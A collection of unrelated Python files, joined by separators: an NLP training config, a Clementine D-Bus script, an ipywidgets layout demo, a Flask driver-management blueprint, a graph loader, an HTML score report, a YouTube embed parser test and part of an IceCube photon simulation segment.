'batch_size': 12,
'columns':[0,1,3,5,8,9], # 5,9misc杂项可放知识库信息
# {'id': 0, 'word': 1, 'lemma': 2, 'upos': 3, 'xpos': 4, 'feats': 5, 'head': 6, 'deprel': 7, 'deps': 8,'misc': 9}
'learning_rate': 3e-5,
'weight_decay':3.0e-9, # 0.01,
'beta1': 0.9,
'beta2': 0.99,
# 'eps': 1.0e-12,
'adam_epsilon': 1e-8,
'warmup_prop': 8,# 单位 epoch
'grad_clip_max_norm': 5.0,
'max_seq_len': 250, # 最长句子不会超过他,目前不用关注
'bert_dim': 768,
'do_lower_case': True,
'bert_dropout': 0.1,
'pretrain_model_path': '../bert_chn',
'biaffine_hidden_dim': 600,
'biaffine_dropout': 0.33,
'use_pos':False,
'use_knowledge':False,
'bert_trans_dim':512,
'pos_dim':256,
'knowledge_dim':128,
'use_transformer': True,
'transformer_layer': 2,
'transformer_dropout': 0.1,
'use_lstm': True,
'lstm_dropout': 0.3,
'use_gat':False,
'gat_alpha': 0.01,
'gat_heads':6,
'gat_hidden': 1024,
'gat_dropout': 0.3,
'cached_path':'dataset/cached',
'dataset_path': 'dataset/',
'relation_vocab_path': 'dataset/vocabs/rel_fine.vocab',
'train_file': 'dataset/sdp_mix_train.conllu_bio',
'dev_file': 'dataset/sdp_text_dev.conllu_bio',
'test_file1': 'dataset/sdp_text_test.conllu_bio',
'test_file2': 'dataset/sdp_news_test.conllu_bio',
# 'dataset_path': 'dataset/',
# 'relation_vocab_path': 'dataset/vocabs/rel_fine.vocab',
# 'train_file': 'dataset/sdp_mix_train.conllu_ner',
# 'dev_file': 'dataset/sdp_text_dev.conllu_ner',
# 'test_file1': 'dataset/sdp_text_test.conllu_ner',
# 'test_file2': 'dataset/sdp_news_test.conllu_ner',
'dataset_path': 'dataset/coarse',
'relation_vocab_path':'dataset/vocabs/rel_coarse.vocab',
'train_file': 'dataset/coarse/coarse_mix.train.conllu',
'dev_file': 'dataset/coarse/coarse_text.dev.conllu',
'test_file1': 'dataset/coarse/coarse_text.test.conllu',
'test_file2': 'dataset/coarse/coarse_news.test.conllu',
'test_file3': 'dataset/coarse/coarse_yqy.test.conllu',
'test_file4': 'dataset/coarse/coarse_dram.test.conllu',
'eval_temp_file':'dataset/eval_temp.conllu',
'debug_file': 'dataset/test.conllu_ner',
'pos_vocab_path': 'dataset/vocabs/pos.vocab',
'bio_vocab_path': 'dataset/vocabs/bio.vocab',
'knowledge_vocab_path': 'dataset/vocabs/knowledge.vocab',
'logger_name': 'mylog',
'output_path': 'output',
'saved_model_path':'output/saved_model',
}
|
#!/usr/bin/python
from dbus import Bus, DBusException
bus = Bus(Bus.TYPE_SESSION)
def get_clem():
try:
return bus.get_object('org.mpris.clementine', '/Player')
except DBusException:
#print "\x02Either Clementine is not running or you have something wrong with your D-Bus setup."
return None
def command_np():
clem = get_clem()
# clemtl = bus.get_object('org.mpris.clementine', '/TrackList')
# clemgl = clemtl.GetLength()
clemp = bus.get_object('org.mpris.clementine', '/Player')
clemmd = clemp.GetMetadata()
if clem:
pos = clem.PositionGet()
return (clemmd['artist'] + " - " + clemmd['title'])
return "?"
print(command_np())
|
__all__ = ['layout']
import ipywidgets as widgets
item_layout = widgets.Layout(height='80px', min_width='30px', min_height='50px', width ='60px',flex_wrap='wrap')
button_styles = ['primary',
'success',
'info',
'warning',
'danger']
items = [widgets.Button(layout=item_layout, description=str(i), button_style=button_styles[i]) for i in range(5)]
# ### Create box to hold the layout demo widgets
#
# The widget deisplayed below will be embedded in a larger widget later in the notebook. That larger widget lets you interactively change the layout of this widget.
# In[ ]:
box_layout = widgets.Layout(overflow_x='scroll',
border='3px solid black',
width='700px',
min_width='50px',
max_width='1000px',
min_height='50px',
max_height='1000px',
height='300px',
flex_direction='row',
display='flex')
widgetGroup = widgets.Box(children=items, layout=box_layout)
widgetGroupAndTitle = widgets.VBox([widgets.Label('Widget area:'), widgetGroup],
layout=widgets.Layout(height='500px', width ='700px'))
widgetGroupAndTitle
# ## Construct widget with controls for changing layout
# ### Create a text area widget where the Python code to reproduce the CSS programmatically.
# In[ ]:
pythonCode = widgets.Textarea(
value='',
placeholder='Python code is exported to this panel....',
description='',
disabled=False
)
pythonCode.layout.width = '80%'
pythonCode.layout.height = '80px'
# ### Create drop downs for choices of `overflow` in `x` and `y`
# In[ ]:
# Set a uniform description width to make alignment easier
style = {'description_width': '100px'}
# Define one of two lists that will hold controls for changing the layout
vboxList = []
# Widget to present overflow style options for x
overflow_x = widgets.Dropdown(
options=['scroll','hidden','auto','visible','initial','inherit'] ,
value = widgetGroup.layout.overflow_x,
description='overflow_x:',
disabled=False,
style=style,
)
# Add the
vboxList.append(overflow_x)
# Set up observer to watch for changes in selected overflow style and apply
# selected style to widgetGroup.
def on_overflow_xchange(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.overflow_x = change.new
# Note how easy it is to get the Python code to generate the layout!
pythonCode.value = str(widgetGroup.layout)
overflow_x.observe(on_overflow_xchange)
# Widget to present overflow style options for y
overflow_y = widgets.Dropdown(
options=['scroll','hidden','auto','visible','initial','inherit'] ,
value='scroll',
description='overflow_y:',
disabled=False,
style=style,
)
vboxList.append(overflow_y)
def on_overflow_y_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.overflow_y = change.new
pythonCode.value = str(widgetGroup.layout)
overflow_y.observe(on_overflow_y_change)
# ### Add some choices for the border around our layout demo
# In[ ]:
border = widgets.Dropdown(
options=['3px solid black', '1px dashed black','2px solid black','3px solid blue', ],
value = widgetGroup.layout.border,
description='border:',
disabled=False,
style=style,
)
vboxList.append(border)
def on_border_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.border = change.new
pythonCode.value = str(widgetGroup.layout)
border.observe(on_border_change)
# ## Add dropdowns for several CSS layout options
# In[ ]:
# flex-flow opetions
flex_flow = widgets.Dropdown(
options=[
'column-reverse',
'column',
'row',
'row-reverse',
],
value='row',
description='flex-flow:',
disabled=False,
style=style,
)
vboxList.append(flex_flow)
def on_flex_flow_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.flex_flow = change.new
pythonCode.value = str(widgetGroup.layout)
flex_flow.observe(on_flex_flow_change)
# flex-direction options
flex_direction = widgets.Dropdown(
options=[
'column-reverse',
'column',
'row',
'row-reverse',
],
value='row',
description='flex-direction:',
disabled=False,
style=style,
)
vboxList.append(flex_direction)
def on_flex_direction_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.flex_direction = change.new
pythonCode.value = str(widgetGroup.layout)
flex_direction.observe(on_flex_direction_change)
# display options
display = widgets.Dropdown(
options=['flex', 'inline-flex'],
value='flex',
description='display:',
disabled=False,
style=style,
)
vboxList.append(display)
def on_display_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.display = change.new
pythonCode.value = str(widgetGroup.layout)
display.observe(on_display_change)
# flex-wrap options
flex_wrap = widgets.Dropdown(
options=[
'nowrap',
'wrap',
'wrap-reverse',
],
value='nowrap',
description='flex-wrap:',
disabled=False,
style=style,
)
vboxList.append(flex_wrap)
def on_flex_wrap_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.flex_wrap = change.new
pythonCode.value = str(widgetGroup.layout)
flex_wrap.observe(on_flex_wrap_change)
# justify-content options
justify_content = widgets.Dropdown(
options=[
'flex-start',
'flex-end',
'center',
'space-between',
'space-around',
],
value='flex-start',
description='justify_content:',
disabled=False,
style=style,
)
vboxList.append(justify_content)
def on_justify_content_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.justify_content = change.new
pythonCode.value = str(widgetGroup.layout)
justify_content.observe(on_justify_content_change)
# align-items options
align_items = widgets.Dropdown(
options=[
'flex-start',
'flex-end',
'center',
'baseline',
'stretch',
],
value='stretch',
description='align_items:',
disabled=False,
style=style,
)
vboxList.append(align_items)
def on_align_items_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.align_items = change.new
pythonCode.value = str(widgetGroup.layout)
align_items.observe(on_align_items_change)
# align-content options
align_content = widgets.Dropdown(
options=[
'flex-start',
'flex-end',
'center',
'space-between',
'space-around',
'space-evenly',
'stretch',
'inherit',
'initial',
'unset'],
value='stretch',
description='align_content:',
disabled=False,
style=style,
)
vboxList.append(align_content)
def on_align_content_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.align_content = change.new
pythonCode.value = str(widgetGroup.layout)
align_content.observe(on_align_content_change)
# ### Set up `VBox` for holding these controls
# In[ ]:
vbox_style_options = widgets.VBox(vboxList)
# ## Set up controls for changing sizes of layout demo
# In[ ]:
# These controls will be grouped together in one VBox. Items added to the list
# below will be placed in that VBox
vboxwidgetSizeList =[]
sizeButtonWidth = '40px'
buttonLayout = widgets.Layout(width=sizeButtonWidth)
# Button/slider combination for adjusting width
width_px_percent = widgets.ToggleButtons(
options=['px', '%',],
description='',
disabled=False,
button_style='', # 'success', 'info', 'warning', 'danger' or ''
tooltips=['Pixels', 'Percent of page',],
)
width_px_percent.style.button_width = sizeButtonWidth
width = widgets.IntSlider(
value = int(widgetGroup.layout.width.replace('%','').replace('px','')),
min=0,
max=1000,
step=1,
description='width:',
disabled=False,
continuous_update=False,
orientation='horizontal',
readout=True,
readout_format='d'
)
def on_width_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.width = str(change.new) + width_px_percent.value
pythonCode.value = str(widgetGroup.layout)
width.observe(on_width_change)
vboxwidgetSizeList.append(widgets.HBox([width, width_px_percent]))
def on_width_px_percent_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.width = str(width.value) + change.new
pythonCode.value = str(widgetGroup.layout)
width_px_percent.observe(on_width_px_percent_change)
# In[ ]:
# Same as above, but for height
height = widgets.IntSlider(
value = int(widgetGroup.layout.height.replace('%','').replace('px','')),
min=0,
max=1000,
step=1,
description='height:',
disabled=False,
continuous_update=False,
orientation='horizontal',
readout=True,
readout_format='d'
)
def on_height_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.height = str(change.new) + height_px_percent.value
pythonCode.value = str(widgetGroup.layout)
height.observe(on_height_change)
height_px_percent = widgets.ToggleButtons(
options=['px', '%',],
description='',
disabled=False,
button_style='', # 'success', 'info', 'warning', 'danger' or ''
tooltips=['Pixels', 'Percent of page',],
)
height_px_percent.style.button_width = sizeButtonWidth # ipywidgets 7.0 and above
vboxwidgetSizeList.append(widgets.HBox([height, height_px_percent]))
def on_height_px_percent_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.height = str(height.value) + change.new
pythonCode.value = str(widgetGroup.layout)
height_px_percent.observe(on_height_px_percent_change)
# In[ ]:
# Slider/buttons for min-width
min_width = widgets.IntSlider(
value=int(widgetGroup.layout.min_width.replace('%','').replace('px','')),
min=0,
max=1000,
step=1,
description='min_width:',
disabled=False,
continuous_update=False,
orientation='horizontal',
readout=True,
readout_format='d'
)
def on_min_width_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.min_width = str(change.new) + min_width_px_percent.value
pythonCode.value = str(widgetGroup.layout)
min_width.observe(on_min_width_change)
min_width_px_percent = widgets.ToggleButtons(
options=['px', '%',],
description='',
disabled=False,
button_style='', # 'success', 'info', 'warning', 'danger' or ''
tooltips=['Pixels', 'Percent of page',],
)
min_width_px_percent.style.button_width = sizeButtonWidth # ipywidgets 7.0 and above
vboxwidgetSizeList.append(widgets.HBox([min_width, min_width_px_percent]))
def on_min_width_px_percent_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.min_width = str(min_width.value) + change.new
pythonCode.value = str(widgetGroup.layout)
min_width_px_percent.observe(on_min_width_px_percent_change)
# In[ ]:
# Now set up max-width controls
max_width = widgets.IntSlider(
value=int(widgetGroup.layout.max_width.replace('%','').replace('px','')),
min=0,
max=1000,
step=1,
description='max_width:',
disabled=False,
continuous_update=False,
orientation='horizontal',
readout=True,
readout_format='d'
)
def on_max_width_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.max_width = str(change.new) + max_width_px_percent.value
pythonCode.value = str(widgetGroup.layout)
max_width.observe(on_max_width_change)
max_width_px_percent = widgets.ToggleButtons(
options=['px', '%',],
description='',
disabled=False,
button_style='', # 'success', 'info', 'warning', 'danger' or ''
tooltips=['Pixels', 'Percent of page',],
)
max_width_px_percent.style.button_width = sizeButtonWidth # ipywidgets 7.0 and above
vboxwidgetSizeList.append(widgets.HBox([max_width, max_width_px_percent]))
def on_max_width_px_percent_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.max_width = str(max_width.value) + change.new
pythonCode.value = str(widgetGroup.layout)
max_width_px_percent.observe(on_max_width_px_percent_change)
# In[ ]:
# max-height controls
max_height = widgets.IntSlider(
value=int(widgetGroup.layout.max_height.replace('%','').replace('px','')),
min=0,
max=1000,
step=1,
description='max_height:',
disabled=False,
continuous_update=False,
orientation='horizontal',
readout=True,
readout_format='d'
)
def on_max_height_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.max_height = str(change.new) + max_height_px_percent.value
pythonCode.value = str(widgetGroup.layout)
max_height.observe(on_max_height_change)
max_height_px_percent = widgets.ToggleButtons(
options=['px', '%',],
description='',
disabled=False,
button_style='', # 'success', 'info', 'warning', 'danger' or ''
tooltips=['Pixels', 'Percent of page',],
)
max_height_px_percent.style.button_width = sizeButtonWidth # ipywidgets 7.0 and above
vboxwidgetSizeList.append(widgets.HBox([max_height, max_height_px_percent]))
def on_max_height_px_percent_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.max_height = str(max_height.value) + change.new
pythonCode.value = str(widgetGroup.layout)
max_height_px_percent.observe(on_max_height_px_percent_change)
# In[ ]:
# min-height controls
min_height = widgets.IntSlider(
value=int(widgetGroup.layout.min_height.replace('%','').replace('px','')),
min=0,
max=1000,
step=1,
description='min_height:',
disabled=False,
continuous_update=False,
orientation='horizontal',
readout=True,
readout_format='d'
)
def on_min_height_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.min_height = str(change.new) + min_height_px_percent.value
pythonCode.value = str(widgetGroup.layout)
min_height.observe(on_min_height_change)
min_height_px_percent = widgets.ToggleButtons(
options=['px', '%',],
description='',
disabled=False,
button_style='', # 'success', 'info', 'warning', 'danger' or ''
tooltips=['Pixels', 'Percent of page',],
)
min_height_px_percent.style.button_width = sizeButtonWidth
vboxwidgetSizeList.append(widgets.HBox([min_height, min_height_px_percent]))
def on_min_height_px_percent_change(change):
if change['type'] == 'change' and change['name'] == 'value':
widgetGroup.layout.min_height = str(min_height.value) + change.new
pythonCode.value = str(widgetGroup.layout)
min_height_px_percent.observe(on_min_height_px_percent_change)
# ### Create `VBox` to hold size controls
# In[ ]:
widgetSizeVbox = widgets.VBox(vboxwidgetSizeList)
# ### Collate all the widgets and display
# In[ ]:
hbox = widgets.HBox([vbox_style_options, widgetSizeVbox, ])
layout = widgets.VBox([pythonCode, hbox, widgetGroupAndTitle, ])
layout
|
from flask import Blueprint, jsonify, render_template, request, url_for
from flask_login import login_required
from app.models.entities.driver import Driver
from app.models.view.driver_view_model import DriverViewModel
from app.service.driver_service import DriverService
from app.utils import TEMPLATES_ROOT_PATH
driver = Blueprint('driver', __name__, template_folder=TEMPLATES_ROOT_PATH, url_prefix="/driver")
driver_service = DriverService()
@driver.route('/')
@login_required
def index():
return render_template('driver/index.html', drivers=driver_service.get_all())
@driver.route('/new', methods=['GET', 'POST'])
@login_required
def register():
if request.method == 'GET':
return render_template('driver/register.html')
else:
new_driver = Driver(name = request.form['name'],
birth_date = request.form['birthdate'],
cpf = request.form['cpf'],
address = request.form['address'])
result = driver_service.insert_driver(new_driver)
if result.success:
result.url = url_for('driver.index')
return jsonify(result.to_json())
@driver.route("<int:id>/update", methods=['GET', 'POST'])
@login_required
def update(id):
driver = Driver.query.get_or_404(id)
if request.method == 'GET':
return render_template('driver/update.html', driver=driver)
else:
driver_view = DriverViewModel(
name = request.form["name"],
birth_date = request.form["birthdate"],
address= request.form["address"])
result = driver_service.update_driver(driver, driver_view)
if result.success:
result.url = url_for('driver.index')
return jsonify(result.to_json())
@driver.route("<int:id>/delete", methods=['GET'])
@login_required
def delete(id):
driver = Driver.query.get_or_404(id)
result = driver_service.delete_driver(driver)
if result.success:
result.url = url_for('driver.index')
return jsonify(result.to_json()) |
import networkx as nx
import os
import numpy as np
from tqdm import tqdm
import copy
def ext(name):
return {
'julia': '.jl'
}[name]
def load_graph(data_dir, min_num_nodes, max_num_nodes, node_labels, graph_labels):
#Each file should contain the datasetname at the front of the file
name = data_dir.split('/')[-1]
#(node_x, node_y)
data_adj = np.loadtxt(
fname=os.path.join(data_dir, '{}_A.txt'.format(name)),
delimiter='|').astype(int)
if node_labels:
#(node_id, **info)
data_node_label = np.loadtxt(
fname=os.path.join(data_dir, '{}_node_labels.txt'.format(name)),
delimiter='|',
dtype={
'names': ('node_id', 'tree_id', 'node_type', 'node_name', 'node_path'),
'formats': ('i4', 'i4', 'S4', 'S100', 'S250')
}
)
else:
#(node_id, graph_id)
data_node_label = np.loadtxt(
fname=os.path.join(data_dir, '{}_graph_indicators.txt'.format(name)),
delimiter='|').astype(int)
#(graph_id, **info)
if graph_labels:
data_graph_label = np.loadtxt(
fname=os.path.join(data_dir, '{}_graph_labels.txt'.format(name)),
delimiter='|',
dtype={
'names': ('tree_id', 'tree_name', 'language', 'stars', 'git_uri', 'last_update'),
'formats': ('i4', 'S100', 'S100', 'i4', 'S250', 'S100')
}
)
else:
#(graph_id)
data_node_label = np.loadtxt(
fname=os.path.join(data_dir, '{}_graph_labels.txt'.format(name)),
delimiter=',',
usecols=(0)).astype(int)
DG = nx.DiGraph()
# Add Edges
data_tuple = list(map(tuple, data_adj))
DG.add_edges_from(data_tuple)
# Add Nodes
node_bar = tqdm(range(data_node_label.shape[0]))
for i in node_bar:
#node_bar.set_description("Processing node {}".format(i))
if node_labels:
DG.add_node(data_node_label[i][0],
label=data_node_label[i][0],
tree_id=data_node_label[i][1],
node_type=data_node_label[i][2],
node_name=data_node_label[i][3],
node_path=data_node_label[i][4],
)
else:
DG.add_node(data_node_label[i][0],
label=data_node_label[i][0],
tree_id=data_node_label[i][1]
)
isolates = list(nx.isolates(DG))
selfloops = list(nx.selfloop_edges(DG))
if len(isolates) or len(selfloops):
print("Removing isolates ({}) and selfloops ({})".format(
len(isolates),
len(selfloops)
))
DG.remove_nodes_from(isolates)
DG.remove_edges_from(selfloops)
tree_id_node_list = dict()
tree_id_lang = dict()
for n in DG.nodes.data():
tree_id = n[1]['tree_id']
if tree_id not in tree_id_node_list:
tree_id_node_list[tree_id] = []
tree_id_lang[tree_id] = False
tree_id_node_list[tree_id].append(n[0])
#check if .jl extension exists
if ext(name) in n[1]['node_name'].decode("utf-8"):
tree_id_lang[tree_id] = True
graphs = []
graph_bar = tqdm(range(data_graph_label.shape[0]))
for i in graph_bar:
#graph_bar.set_description("Processing graph {}".format(i))
tree_id = data_graph_label[i][0]
#Search for nodes with same tree-id
nodes = tree_id_node_list[tree_id]
#Language file exist
lang = tree_id_lang[tree_id]
#Create sub-graph
G_sub = DG.subgraph(nodes).copy()
G_sub.graph['label'] = tree_id
#lang node reduces the number of additional steps
if graph_labels:
G_sub.graph['tree_id'] = tree_id
G_sub.graph['tree_name'] = data_graph_label[i][1]
G_sub.graph['language'] = data_graph_label[i][2]
G_sub.graph['stars'] = data_graph_label[i][3]
G_sub.graph['git_uri'] = data_graph_label[i][4]
G_sub.graph['last_update'] = data_graph_label[i][5]
if G_sub.number_of_nodes() >= min_num_nodes \
and G_sub.number_of_nodes() <= max_num_nodes \
and lang:
graphs.append(G_sub)
#print(G_sub.graph['tree_name'], G_sub.graph['tree_id'])
return graphs
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
'''
Contaisn the functions for printing the evaluation results in an HTML file
'''
def coda_html(num, ill_drs_ids, counts, measures, types, cr_mdict):
'''Gets the number of CLFs, ids of ill DRSs, counts for produced, gold and matching clauses,
evaluation measures like precision, recall and F-scores, the list of detailed metrics,
and their corresponding evaluation measures.
Output is an html content representing the input.
'''
# unpack tuples
(prod_cl, gold_cl, match_cl) = counts
types = sorted(types, key=lambda x: lab2num(x))
# internal css style and other styling
style = ("table, th, td { border: 1px solid black; border-collapse: collapse;}\n"
"#tot {background-color: #222; color: #fff; font-weight: bold;}\n"
"td {text-align: right;}\n"
".ltd {text-align: left;}\n"
"th {background-color: #648ca8; color: #fff;}\n"
"th, td {padding: 2px 10px 2px 10px;}\n"
".oddrow {background-color: #eee;}\n"
".evenrow {background-color: #fff;}\n"
'.mono {font-family: "Courier New", Courier, monospace;}\n'
)
header = '<head>\n<style>\n{}\n</style>\n</head>'.format(style)
tag = 'p'
# generating the content
body = '<{0}>Number of system-gold pairs of CLFs: <b>{1}</b></{0}>\n'.format(
tag, num)
body += '<{0}>Number of ill CLFs (i.e. non-DRSs) produced by the system: <b>{1}</b></{0}>\n'.format(
tag, len(ill_drs_ids))
body += '<{0}>Total number of clauses in system / gold CLFs: <b>{1}</b> / <b>{2}</b></{0}>\n'.format(
tag, prod_cl, gold_cl)
body += '<{0}>Total number of matching clauses: <b>{1}</b></{0}>\n'.format(
tag, match_cl)
# create the table with scores
body += '<table style="width:100%">\n'
body += '<tr>\n<th>Clause types</th>\n<th>Precision</th>\n<th>Recall</th>\n<th>F-score</th>\n</tr>\n'
for (i, c) in enumerate(types):
sty = 'evenrow' if i % 2 == 0 else 'oddrow'
body += '<tr class="{}">\n<td class="ltd">{}</td>\n<td>{:.2%}</td>\n<td>{:.2%}</td>\n<td>{:.2%}</td>\n</tr>\n'.format(
sty, indent(c), *cr_mdict[c])
body += '<tr id="tot">\n<td class="ltd">Total</td>\n<td>{:.2%}</td>\n<td>{:.2%}</td>\n<td>{:.2%}</td>\n</tr>\n'.format(
*measures)
# close the table
body += '</table>\n'
# print the list of ill-CLF ids
if ill_drs_ids:
body += '<p>{}: <span class="mono">{}</span></p>\n'.format(
'IDs of ill CLFs', ', '.join(map(str, ill_drs_ids)))
return '<!DOCTYPE html>\n<meta charset=utf-8>\n<html>\n{}\n<body>\n{}\n</body>\n</html>'.format(header, body)
def indent(label, n=4):
'''Indent the clause types
'operators','roles','concepts','nouns','verbs','adjectives','adverbs','events'
'''
mapping = { 'nouns': n*' '+'Nouns',
'adjectives': 2*n*' '+'Adjectives',
'verbs': 2*n*' '+'Verbs',
'adverbs': n*' '+'Adverbs',
'events': n*' '+'Events'
}
return mapping.get(label, label.title())
def lab2num(label):
'''Map the type to a number for the ordering purposes:
'operators','roles','concepts','nouns','verbs','adjectives','adverbs','events'
'''
mapping = { 'operators': 1,
'roles': 2,
'concepts': 3,
'events': 5,
'nouns': 4,
'verbs': 6,
'adjectives': 7,
'adverbs': 8
}
return mapping[label]
|
# -*- coding: utf-8 -*-
import pytest
from html2ans.parsers.embeds import YoutubeEmbedParser
@pytest.mark.parametrize('tag_string,expected_id', [
('<iframe src="https://www.youtube.com/embed/7IBERQ9abkk?feature=oembed"></iframe>',
"https://www.youtube.com/watch?v=7IBERQ9abkk"),
('<iframe src=\"http://www.youtube.com/embed/gZnNmCf2Zok\"></iframe>',
"https://www.youtube.com/watch?v=gZnNmCf2Zok"),
('<iframe src=\"http://www.youtube.com/embed/OVK-tGUZy9A?rel=0\"></iframe>',
"https://www.youtube.com/watch?v=OVK-tGUZy9A"),
('<iframe src="https://www.youtube.com/embed/3TqLNkLdpGY"></iframe>',
"https://www.youtube.com/watch?v=3TqLNkLdpGY"),
('<iframe src="https://www.youtube.com/embed/4I86iz4X4jM"></iframe>',
"https://www.youtube.com/watch?v=4I86iz4X4jM")
])
def test_embed_parser(tag_string, expected_id, make_http_tag, make_https_tag):
for test_function in [make_http_tag, make_https_tag]:
embed_tag = test_function(tag_string, "iframe")
result, match = YoutubeEmbedParser().parse(embed_tag)
assert match is True
assert result["type"] == "reference"
assert result["referent"]["id"] == expected_id
assert result["referent"]["type"] == "youtube"
assert result["referent"]["provider"] == YoutubeEmbedParser.provider
|
#!/usr/bin/env python
import os
import subprocess
import threading
import time
import logging
from os.path import expandvars
from icecube import icetray, dataclasses
import math
def taskset(pid,tt=None):
# get/set the taskset affinity for pid
# uses a binary number string for the core affinity
l = ['/bin/taskset','-p']
if tt:
l.append(hex(int(tt,2))[2:])
l.append(str(pid))
p = subprocess.Popen(l,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = p.communicate()[0].split(':')[-1].strip()
if not tt:
return bin(int(output,16))[2:]
def tasksetInUse():
# check for cpu affinity (taskset)
try:
num_cpus = reduce(lambda b,a: b+int('processor' in a),open('/proc/cpuinfo').readlines(),0)
affinity = taskset(os.getpid())
if len(affinity) < num_cpus:
return True
for x in affinity[:num_cpus]:
if x != '1':
return True
return False
except Exception:
return False
def resetTasksetThreads(main_pid):
# reset thread taskset affinity
time.sleep(60)
try:
num_cpus = reduce(lambda b,a: b+int('processor' in a),open('/proc/cpuinfo').readlines(),0)
tt = '1'*num_cpus
p = subprocess.Popen(['/bin/ps','-Lo','tid','--no-headers','%d'%main_pid],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
for tid in p.communicate()[0].split():
tid = tid.strip()
if tid:
taskset(tid,tt)
except Exception:
pass
def LoadCascadeTables(IceModel = "SpiceMie", TablePath = "/data/sim/sim-new/spline-tables"):
from icecube import photonics_service
if IceModel == "Spice1":
amplitudetable = TablePath+'/ems_spice1_z20_a10.abs.fits'
timingtable = TablePath+'/ems_spice1_z20_a10.prob.fits'
elif IceModel == "SpiceMie":
amplitudetable = TablePath+'/ems_mie_z20_a10.abs.fits'
timingtable = TablePath+'/ems_mie_z20_a10.prob.fits'
elif IceModel == "SpiceMieNoHoleIce":
amplitudetable = TablePath+'/NoHoleIceCascades_250_z20_a10.abs.fits'
timingtable = TablePath+'/NoHoleIceCascades_250_z20_a10.prob.fits'
else:
raise RuntimeError("Unknown ice model: %s", IceModel)
logging.debug("Loading cascade tables : ")
logging.debug(" amp = ", amplitudetable)
logging.debug(" time = ", timingtable)
cascade_service = photonics_service.I3PhotoSplineService(
amplitudetable=amplitudetable,
timingtable=timingtable,
timingSigma=0.,
maxRadius=800.*icetray.I3Units.meter)
return cascade_service
@icetray.traysegment
def PropagatePhotons(tray, name,
GCDFile,
If=lambda f:True ,
RandomService = None,
KeepIndividualMaps = False,
HybridMode = False,
IgnoreMuons = False,
IgnoreCascades = False,
UseGPUs = False,
UseAllCPUCores = False,
KeepSlicedMCTree = False,
IceModel = "spice_3.2",
CascadeService = None,
IceModelLocation = None,
UseCascadeExtension = True,
UseGeant4=False,
CrossoverEnergyEM=None,
CrossoverEnergyHadron=None,
UnshadowedFraction = 1.0, #changed 2014-10-16 to IC86 nominal preset, IC79 used 0.9
DOMOversizeFactor=5.0,
HoleIceParameterization=expandvars("$I3_SRC/ice-models/resources/models/angsens/as.h2-50cm"),
InputMCTree="I3MCTree",
UseI3PropagatorService = False,
OutputPESeriesMapName="I3MCPESeriesMap",
OutputPhotonSeriesName=None,
):
""" This traysegment offers multiple tweaks for adapted processing in different energy ranges,
for example GEANT4 in conjunction with Parametrizations for the treatment for lowest energies
and a HybridMode with the use of tables for the treatment of high energies.
In any case, please refer to the documentation of clsim to find suitable settings for your
simulation needs """
from I3Tray import I3Units
from icecube import icetray, dataclasses, dataio
from icecube import phys_services, sim_services
from icecube import clsim, photonics_service
from os import listdir
from os.path import isdir
if IgnoreMuons and not HybridMode:
raise RuntimeError("Can currently only ignore muons in hybrid mode")
clsimIceModel = None
if IceModelLocation is None:
IceModelLocation = expandvars("$I3_BUILD/ice-models/resources/models")
if isinstance(IceModel, clsim.I3CLSimMediumProperties):
if HybridMode:
raise RuntimeError("Cannot use custom ice models in hybrid mode")
clsimIceModel = IceModel
elif IceModel == "Spice1":
clsimIceModel = expandvars(IceModelLocation+"/spice_1")
elif IceModel == "SpiceMie":
clsimIceModel = expandvars(IceModelLocation+"/spice_mie")
elif IceModel == "SpiceLea":
clsimIceModel = expandvars(IceModelLocation+"/spice_lea")
else:
for d in listdir(IceModelLocation):
if isdir(expandvars(IceModelLocation+"/"+d)) and IceModel.lower() == d.lower():
clsimIceModel = expandvars(IceModelLocation+"/"+d)
break
if not clsimIceModel:
raise RuntimeError("Unknown ice model: %s", IceModel)
if HybridMode and IceModel not in ("Spice1","SpiceMie"):
raise RuntimeError("Can only use Spice1 and SpiceMie in hybrid mode. photon tables do not support ice anisotropy at this time.")
if (not IgnoreCascades) and HybridMode:
if CascadeService is None:
logging.warning("*** no cascades tables provided. Loading tables for", IceModel)
# If we can see CVMFS, we'll get the splines from there.
# Note : when available, switch icecube.wisc.edu for icecube.opensciencegrid.org
UseSplinesFromCVMFS = os.path.isdir("/cvmfs/icecube.opensciencegrid.org/data/photon-tables/splines")
if(UseSplinesFromCVMFS):
TablePath="/cvmfs/icecube.opensciencegrid.org/data/photon-tables/splines"
else:
TablePath="/data/sim/sim-new/spline-tables"
logging.info("Using splines from CVMFS: ", UseSplinesFromCVMFS)
# Work out which splines to use based on ice model preferences
if(HoleIceParameterization==expandvars('$I3_SRC/ice-models/resources/models/angsens/as.h2-50cm')):
CascadeModel=IceModel
elif(HoleIceParameterization==expandvars('$I3_SRC/ice-models/resources/models/angsens/as.nominal')):
if IceModel=="SpiceMie":
CascadeModel="SpiceMieNoHoleIce"
else:
raise RuntimeError("No no-hole-ice spline for %s", IceModel)
else:
raise RuntimeError("No spline for %s with hole ice param %s", IceModel, HoleIceParameterization)
